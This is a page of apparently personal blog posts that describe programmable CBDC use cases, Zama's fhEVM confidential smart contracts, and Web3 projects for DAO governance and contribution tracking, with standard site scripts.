<p><strong>4. Real Estate and Asset Tokenization</strong><br>房地产和资产代币化<br>Programmable CBDCs can streamline large, complex transactions like real estate purchases:<br>• <em>Escrow Mechanisms for Property Sales</em>: CBDCs can serve as programmable escrow funds, where funds are only released when all contractual conditions, like title transfer or inspections, are fulfilled.<br>• <em>Fractional Ownership and Dividends</em>: Asset tokenization (e.g., in real estate) could enable CBDCs to automatically distribute dividends to token holders, representing fractional property ownership.</p>
<p><strong>5. Cross-Border Trade and Remittances</strong><br>跨境贸易和汇款<br>CBDCs can simplify cross-border payments by integrating automatic conversion and compliance features:<br>• <em>Instant Cross-Currency Settlement</em>: Programmable CBDCs could automatically convert funds to the recipient’s currency, applying relevant fees or exchange rates instantly.<br>• <em>Compliance Checks for AML/KYC</em>: Programmable CBDCs could enforce AML/KYC requirements by automatically flagging suspicious activity, reducing regulatory risk and speeding up international transactions.</p>
<p><strong>6. Subscription Payments and Recurring Services</strong><br>订阅付款和定期服务<br>CBDCs could automate recurring payments in subscription-based business models:<br>• <em>Automated Subscription Management</em>: CBDCs could be programmed for regular, automated payments (e.g., streaming services, SaaS platforms), simplifying billing and reducing the risk of service disruptions.<br>• <em>Usage-Based Pricing</em>: CBDCs could support “pay-as-you-go” pricing models where charges are automatically applied based on usage, especially useful for cloud services or utilities.</p>
<p><strong>7. Capital Markets and Wholesale CBDC Use Cases</strong><br>资本市场和批发 CBDC 用例<br>For wholesale CBDCs, programmability opens new avenues in capital markets:<br>• <em>Automated Clearing and Settlement</em>: CBDCs could eliminate the need for intermediaries by automatically executing settlements upon matching transaction records between two parties.<br>• <em>Repo and Derivatives Markets</em>: CBDCs can streamline collateral management by automatically adjusting collateral requirements, executing margin calls, or managing repos in real-time based on market fluctuations.</p>
<p><strong>8. Reward Programs and Customer Loyalty</strong><br>奖励计划和客户忠诚度<br>Businesses could use programmable CBDCs for customer reward programs:<br>• <em>Automatic Loyalty Points</em>: CBDCs could be programmed to add loyalty points automatically for every purchase, simplifying the customer experience.<br>• <em>Conditional Rewards</em>: Rewards could be programmed to expire or apply only to specific purchases, making it easy to customize loyalty offers for each customer segment.</p>
<p><strong>9. Carbon Credit and Green Finance</strong><br>碳信用和绿色金融<br>CBDCs could play a role in incentivizing environmentally sustainable behavior:<br>• <em>Carbon Credit Trading</em>: CBDCs could enable automated carbon credit settlements between companies, enforcing green finance commitments.<br>• <em>Green Rewards</em>: Government programs could incentivize green purchases by programming CBDCs to offer discounts or rewards for sustainable activities, such as using public transport or purchasing eco-friendly products.<br>These use cases highlight how CBDC programmability could drive efficiencies, automate compliance, and introduce innovative business models across multiple sectors, benefiting both businesses and consumers.</p>
<p>Programmable CBDCs offer interesting possibilities for end users to create custom payment solutions and manage <strong>personal</strong> finances in new ways. Here are a few examples:</p>
<p><strong>1. Personal Budgeting and Spending Controls</strong><br>个人预算和支出控制<br>• <strong>Automated Savings</strong> 自动储蓄: Users could program a portion of their income (e.g., 10%) to automatically transfer to a savings wallet whenever they receive a paycheck, supporting disciplined saving habits.<br>• <strong>Category-Based Spending Limits</strong> 消费归类: End users could set monthly spending caps for specific categories, such as dining out or entertainment, to better manage their budgets and spending behavior.<br>• <strong>Automatic Rounding for Savings</strong> 储蓄和消费预估: Each purchase could be rounded up to the nearest dollar, with the “extra” going to a savings or investment account—similar to popular savings apps.</p>
<p><strong>2. Shared Wallets for Families or Groups</strong><br>家庭或团体共享钱包<br>• <strong>Family Allowance System</strong>: Parents could set up programmable wallets for children, where funds are released for specific purposes, like school supplies or transportation. Funds could be set to expire if unused within a certain period, encouraging responsible spending.<br>• <strong>Household Expense Management</strong>: Roommates or couples could create a shared wallet programmed to split common expenses like rent, utilities, or groceries automatically, reducing manual tracking and making shared expenses more transparent.</p>
<p><strong>3. Charitable Donations with Conditions</strong><br>有条件的慈善捐赠<br>• <strong>Conditional Charity Donations</strong>: Users could set up automatic donations to charities that activate only when personal income exceeds a certain threshold, allowing them to give back when they are financially able.<br>• <strong>Transparent Donations</strong>: CBDCs could allow donors to see exactly when and how their funds are used by a charity, increasing transparency and engagement with the causes they support.</p>
<p><strong>4. Emergency Funds and Auto-Trigger Insurance</strong><br>应急资金和自动触发保险<br>• <strong>Self-Triggered Emergency Payments</strong>: Users could set up a programmable emergency fund to automatically transfer to their main wallet if their balance falls below a certain level.<br>• <strong>Automated Micro-Insurance Payments</strong>: End users could set up small automatic payments for emergency health or travel insurance, activating only when they cross country borders or travel a specified distance.</p>
<p><strong>5. Conditional Gifting and Allowances</strong><br>有条件的赠与和津贴<br>• <strong>Smart Gifting</strong>: CBDCs could allow users to set up gifts with conditions, such as funds for a child’s education that can only be used for tuition, books, or school supplies.<br>• <strong>Goal-Based Allowances</strong>: Parents could use programmable CBDCs to set up an allowance system that releases funds to their children only after achieving certain goals, like completing homework or chores.</p>
<p><strong>6. Automated Bill Splitting for Social Activities</strong><br>社交活动账单自动分摊<br>• <strong>Social Wallets</strong>: Friends could create a shared, programmable wallet for social events, where each person contributes, and funds are automatically allocated for event-specific expenses, like concert tickets or group dinners.<br>• <strong>Real-Time Expense Tracking</strong>: Programmed CBDCs could split expenses in real-time as they occur, making group activities financially smoother and removing the need for after-the-fact reimbursements.</p>
<p><strong>7. Customizable Travel Budgets and Currency Conversion</strong><br>可定制的旅行预算和货币兑换<br>• <strong>Vacation Budgeting</strong>: Travelers could allocate a specific budget for their trip, where funds automatically convert to the local currency and apply spending limits to ensure they stay within their set vacation budget.<br>• <strong>Location-Based Spending</strong>: Users could set geographic restrictions on their CBDC wallets, preventing them from spending funds outside a designated area or country, adding an extra layer of control and security for travel budgets.</p>
<p><strong>8. Personal Investment Automations</strong><br>个人投资自动化<br>• <strong>Recurring Investments</strong>: End users could program their CBDCs to allocate a small percentage of each paycheck into specific investments or savings accounts, making it easy to automate dollar-cost averaging.<br>• <strong>Goal-Based Investment Triggers</strong>: Users could set up a CBDC wallet to transfer funds to an investment account only if they’ve met other financial goals for the month, like saving or debt repayment targets.</p>
<p><strong>9. Incentivized Health and Wellness Programs</strong><br>激励健康和保健计划<br>• <strong>Rewards for Healthy Activities</strong>: End users could connect programmable CBDCs to health tracking apps to earn micro-payments for activities such as reaching a daily step goal, gym attendance, or purchasing healthy food.<br>• <strong>Goal-Based Health Savings</strong>: CBDCs could also be used to allocate funds to a “health fund” every time a fitness milestone is reached, rewarding users for making healthy choices.</p>
<p><strong>10. Flexible Subscription Management</strong><br>灵活的订阅管理<br>• <strong>Trial Periods with Expiry</strong>: End users could set up subscriptions to only renew if they actively confirm, helping avoid unwanted subscription charges.<br>• <strong>Family Subscription Pools</strong>: Users could program CBDCs to fund family-wide subscriptions where family members contribute proportionally, or enable automatic payments only if usage metrics meet certain thresholds.</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/10/31/fhEVM-confidential-smart-contracts-on-the-EVM-using-FHE/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/10/31/fhEVM-confidential-smart-contracts-on-the-EVM-using-FHE/" class="post-title-link" itemprop="url">fhEVM-confidential-smart-contracts-on-the-EVM-using-FHE</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-10-31 16:54:00" itemprop="dateCreated datePublished" datetime="2024-10-31T16:54:00+08:00">2024-10-31</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">Edited on</span>
<time title="Modified: 2024-11-15 14:18:37" itemprop="dateModified" datetime="2024-11-15T14:18:37+08:00">2024-11-15</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h2 id="https-github-com-zama-ai-fhevm"><a href="#https-github-com-zama-ai-fhevm" class="headerlink" title="https://github.com/zama-ai/fhevm"></a><a target="_blank" rel="noopener" href="https://github.com/zama-ai/fhevm">https://github.com/zama-ai/fhevm</a></h2><p><strong>fhEVM</strong> is a technology that enables confidential smart contracts on the EVM using fully homomorphic encryption (FHE).</p>
<ul>
<li><strong>Solidity integration:</strong> fhEVM contracts are simple solidity contracts that are built using traditional solidity toolchains.</li>
<li><strong>Simple developer experience:</strong> Developers can use the <code>euint</code> data types to mark which part of their contracts should be private.</li>
<li><strong>Programmable privacy:</strong> All the logic for access control of encrypted states is defined by developers in their smart contracts.</li>
<li><strong>High precision encrypted integers :</strong> Up to 256 bits of precision for integers</li>
<li><strong>Full range of operators :</strong> All typical operators are available: <code>+</code>, <code>-</code>, <code>*</code>, <code>/</code>, <code><</code>, <code>></code>, <code>==</code>, …</li>
<li><strong>Encrypted if-else conditionals :</strong> Check conditions on encrypted states</li>
<li><strong>On-chain PRNG :</strong> Generate secure randomness without using oracles</li>
<li><strong>Configurable decryption :</strong> Threshold, centralized or KMS decryption</li>
<li><strong>Unbounded compute Depth :</strong> Unlimited consecutive FHE operations<br>Even Circle build a confidential ERC20 on fhEVM - <a target="_blank" rel="noopener" href="https://github.com/Inco-fhevm/confidential-erc20-framework">https://github.com/Inco-fhevm/confidential-erc20-framework</a> .<br>Let’s deep dive in it:<h2 id="Decrypt-and-reencrypt"><a href="#Decrypt-and-reencrypt" class="headerlink" title="Decrypt and reencrypt"></a>Decrypt and reencrypt</h2>On fhevm blockchain - ZAMA team built, private key is owned by a Key Management Service (KMS). If the plaintext value is needed at some point, there are two ways to obtain it. Both methods are handled by a service called the Gateway.<br>fhevm allow explicit decryption requests for any encrypted type. The values are decrypted with the network private key.<br><img src="/2024/10/31/fhEVM-confidential-smart-contracts-on-the-EVM-using-FHE/1.png"><br>the detail implementation ==> <a target="_blank" rel="noopener" href="https://docs.zama.ai/fhevm/guides/decrypt">https://docs.zama.ai/fhevm/guides/decrypt</a></li>
</ul>
<p>Reencryption is performed on the client side by calling the gateway service using the <a target="_blank" rel="noopener" href="https://github.com/zama-ai/fhevmjs/">fhevmjs</a> library.</p>
<p>Zama has another project of FHE on AI — <a target="_blank" rel="noopener" href="https://github.com/zama-ai/concrete-ml">https://github.com/zama-ai/concrete-ml</a></p>
<h2 id="confidential-erc20"><a href="#confidential-erc20" class="headerlink" title="confidential-erc20"></a>confidential-erc20</h2><p><a target="_blank" rel="noopener" href="https://www.inco.org/" title="https://www.inco.org/">https://www.inco.org/</a> and <a target="_blank" rel="noopener" href="https://www.circle.com/en/circle-research">Circle</a> publish a framework <a target="_blank" rel="noopener" href="https://github.com/Inco-fhevm/confidential-erc20-framework">https://github.com/Inco-fhevm/confidential-erc20-framework</a> which is leveraging on <strong>fhEVM</strong>:</p>
<ul>
<li>conceals balances.</li>
<li>transaction amounts.</li>
<li>optional viewing and transfer rules to meet regulatory obligations or enhance programmatic risk management.</li>
<li>the counter parties addresses are published on public blockchain.</li>
<li>the private key is also configured as kms-service.</li>
</ul>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/" class="post-title-link" itemprop="url">Status-Update-DAO-Data&project-management-and-governance-by-Web3</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-10-31 16:08:00" itemprop="dateCreated datePublished" datetime="2024-10-31T16:08:00+08:00">2024-10-31</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">Edited on</span>
<time title="Modified: 2024-11-15 14:21:34" itemprop="dateModified" datetime="2024-11-15T14:21:34+08:00">2024-11-15</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p><a target="_blank" rel="noopener" href="https://kosmos.org/">https://kosmos.org/</a> are developing a free, open-source, and user-centric alternative to centralized group chat platforms. They offer <a target="_blank" rel="noopener" href="https://kosmos.org/projects/">https://kosmos.org/projects/</a>:</p>
<h3 id="1-Kosmos-Accounts-amp-Services"><a href="#1-Kosmos-Accounts-amp-Services" class="headerlink" title="1) Kosmos Accounts & Services"></a>1) Kosmos Accounts & Services</h3><p>Kosmos Accounts give people access to Kosmos hosted services.</p>
<h3 id="2-Kosmos-Chat"><a href="#2-Kosmos-Chat" class="headerlink" title="2) Kosmos Chat"></a>2) Kosmos Chat</h3><p>Kosmos Chat is a group chat application. All of its components can be either self-hosted or connected to hosted services. <strong>No user data is ever locked into hosted silos</strong>.</p>
<h3 id="3-Kredits-—-https-kredits-kosmos-org-dashboard"><a href="#3-Kredits-—-https-kredits-kosmos-org-dashboard" class="headerlink" title="3) Kredits — https://kredits.kosmos.org/dashboard"></a>3) Kredits — <a target="_blank" rel="noopener" href="https://kredits.kosmos.org/dashboard">https://kredits.kosmos.org/dashboard</a></h3><p>Kredits are a system for tracking opensource project contributions, enabling and facilitating the fair and transparent use of project funds, as well as improving project management and governance.<br><a target="_blank" rel="noopener" href="https://wiki.kosmos.org/Kredits">https://wiki.kosmos.org/Kredits</a></p>
<h4 id="High-level-overview"><a href="#High-level-overview" class="headerlink" title="High-level overview"></a>High-level overview</h4><p><img src="/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/1.png"></p>
<h3 id="Similar-projects-ideas"><a href="#Similar-projects-ideas" class="headerlink" title="Similar projects/ideas"></a>Similar projects/ideas</h3><ol>
<li><a target="_blank" rel="noopener" href="https://colony.io/">https://colony.io/</a> — Colony is a DAO which exists to make it easy for others to build DAOs.<br> <strong>How Colony Makes Money</strong><br><img src="/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/2.png"></li>
</ol>
<ul>
<li>The Colony Network levies a small fee on Payments leaving a colony to an external address.</li>
<li>Fees paid in whitelisted tokens like USDC, USDT, WETH or xDAI go to the Metacolony to incentivise contributors.</li>
<li>Fees paid in other ERC20 tokens go to auctions where token buyers can purchase ERC20 tokens using CLNY, which is burned.</li>
</ul>
<ol start="2">
<li><p><a target="_blank" rel="noopener" href="https://github.com/Commonfare-net/macao-social-wallet">https://github.com/Commonfare-net/macao-social-wallet</a> , <a target="_blank" rel="noopener" href="https://freecoin.dyne.org/">https://freecoin.dyne.org/</a> — Freecoin is a set of tools to let people run <strong>reward schemes</strong> that are <strong>transparent and auditable</strong> to other organisations. It is made for <strong>participatory and democratic organisations</strong> who want to incentivise participation, unlike centralised banking databases.</p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://giveth.io/">https://giveth.io/</a> — Support global projects in the fields of public goods, sustainability and regeneration through cryptocurrency donations. <a target="_blank" rel="noopener" href="https://github.com/Giveth">https://github.com/Giveth</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.gitcoin.co/">https://www.gitcoin.co/</a> — Gitcoin Grants Program, we’ve distributed over $60M to early stage builders championing projects across DeFi, climate, open source and beyond.</p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://shapeshift.com/">https://shapeshift.com/</a> — ShapeShift champions the principles of permissionless access, trustless operations, privacy, and non-custodial asset management, providing users with a secure and autonomous digital currency management experience. ShapeShift supports 150+ different wallets including MetaMask, Ledger, xDeFi, WalletConnect, Coinbase, and Keplr.<br><img src="/2024/10/31/Status-Update-DAO-Data&project-management-and-governance-by-Web3/3.png"></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://activitypods.org/">https://activitypods.org/</a> , <a target="_blank" rel="noopener" href="https://github.com/activitypods/activitypods">https://github.com/activitypods/activitypods</a> — Solid (Social Linked Data) is a set of specifications whose aim is to allow users to store all their data in Pods (“Personal Online Datastores”). Users have full control over their Pods and can give permissions to applications or people they trust. <a target="_blank" rel="noopener" href="https://solidproject.org/">https://solidproject.org/</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.hyphanet.org/">https://www.hyphanet.org/</a> , <a target="_blank" rel="noopener" href="https://github.com/hyphanet/fred">https://github.com/hyphanet/fred</a> — a peer-to-peer platform for <strong>censorship-resistant</strong> and <strong>privacy-respecting</strong> publishing and communication.</p>
</li>
</ol>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<nav class="pagination">
<span class="page-number current">1</span><a class="page-number" href="/page/2/">2</a><span class="space">…</span><a class="page-number" href="/page/53/">53</a><a class="extend next" rel="next" href="/page/2/"><i class="fa fa-angle-right" aria-label="Next page"></i></a>
</nav>
<script>
window.addEventListener('tabs:register', () => {
let { activeClass } = CONFIG.comments;
if (CONFIG.comments.storage) {
activeClass = localStorage.getItem('comments_active') || activeClass;
}
if (activeClass) {
const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
if (activeTab) {
activeTab.click();
}
}
});
if (CONFIG.comments.storage) {
window.addEventListener('tabs:click', event => {
if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
const commentClass = event.target.classList[1];
localStorage.setItem('comments_active', commentClass);
});
}
</script>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<div class="copyright">
©
<span itemprop="copyrightYear">2024</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">Weiming Zhuang</span>
</div>
</div>
</footer>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>
<script src="/js/local-search.js"></script>
<script>
if (typeof MathJax === 'undefined') {
window.MathJax = {
tex: {
inlineMath: {'[+]': [['$', '$']]},
tags: 'none'
},
options: {
renderActions: {
insertedScript: [200, () => {
document.querySelectorAll('mjx-container').forEach(node => {
const target = node.parentNode;
if (target.nodeName.toLowerCase() === 'li') {
target.parentNode.classList.add('has-jax');
}
});
}, '', false]
}
}
};
const script = document.createElement('script');
script.src = 'https://cdn.jsdelivr.net/npm/[email protected]/es5/tex-mml-chtml.js';
script.defer = true;
document.head.appendChild(script);
} else {
MathJax.startup.document.state(0);
MathJax.typesetClear();
MathJax.texReset();
MathJax.typeset();
}
</script>
</body>
</html>